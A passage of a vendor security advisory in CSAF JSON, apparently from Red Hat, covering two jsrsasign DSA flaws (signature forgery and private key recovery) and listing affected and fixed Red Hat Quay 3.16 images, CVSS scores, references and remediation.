            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2450208"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in jsrsasign. An attacker can exploit improper verification of cryptographic signatures by supplying malicious domain parameters during the Digital Signature Algorithm (DSA) validation process. This allows the attacker to forge DSA signatures or X.509 certificates, which would then be accepted as legitimate, potentially leading to unauthorized access or data manipulation.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "jsrsasign: jsrsasign: Cryptographic signature forgery via malicious DSA domain parameters",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "IMPORTANT. The flaw in jsrsasign allows an attacker to forge Digital Signature Algorithm (DSA) signatures or X.509 certificates by providing malicious domain parameters during validation. This could lead to unauthorized access or data manipulation in affected Red Hat products such as Migration Toolkit for Virtualization and Red Hat Quay, where jsrsasign is utilized for cryptographic signature verification.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4600"
        },
        {
          "category": "external",
          "summary": "RHBZ#2450208",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450208"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4600",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4600"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4600",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4600"
        },
        {
          "category": "external",
          "summary": "https://gist.github.com/Kr0emer/bf15ddc097176e951659a24a8e9002a7",
          "url": "https://gist.github.com/Kr0emer/bf15ddc097176e951659a24a8e9002a7"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/commit/37b4c06b145c7bfd6bc2a6df5d0a12c56b15ef60",
          "url": "https://github.com/kjur/jsrsasign/commit/37b4c06b145c7bfd6bc2a6df5d0a12c56b15ef60"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/pull/646",
          "url": "https://github.com/kjur/jsrsasign/pull/646"
        },
        {
          "category": "external",
          "summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370940",
          "url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370940"
        }
      ],
      "release_date": "2026-03-23T05:00:08.475000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "jsrsasign: jsrsasign: Cryptographic signature forgery via malicious DSA domain parameters"
    },
    {
      "cve": "CVE-2026-4601",
      "cwe": {
        "id": "CWE-325",
        "name": "Missing Cryptographic Step"
      },
      "discovery_date": "2026-03-23T06:01:44.014846+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2450209"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in jsrsasign. An attacker can exploit a missing cryptographic step in the Digital Signature Algorithm (DSA) signing process, specifically within the KJUR.crypto.DSA.signWithMessageHash function. By manipulating the signature generation to force specific values, the library emits an invalid signature without retrying. This vulnerability allows an attacker to recover the private key used for signing.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "jsrsasign: jsrsasign: Private Key Recovery via Missing Cryptographic Step in DSA Signing",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "IMPORTANT: A flaw in the jsrsasign library allows for private key recovery due to a missing cryptographic step in the Digital Signature Algorithm (DSA) signing process. An attacker can manipulate signature generation within the KJUR.crypto.DSA.signWithMessageHash function to force specific values, enabling the recovery of the private key. This impacts Red Hat products utilizing jsrsasign, such as Migration Toolkit for Virtualization and Red Hat Quay.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4601"
        },
        {
          "category": "external",
          "summary": "RHBZ#2450209",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450209"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4601",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4601"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4601",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4601"
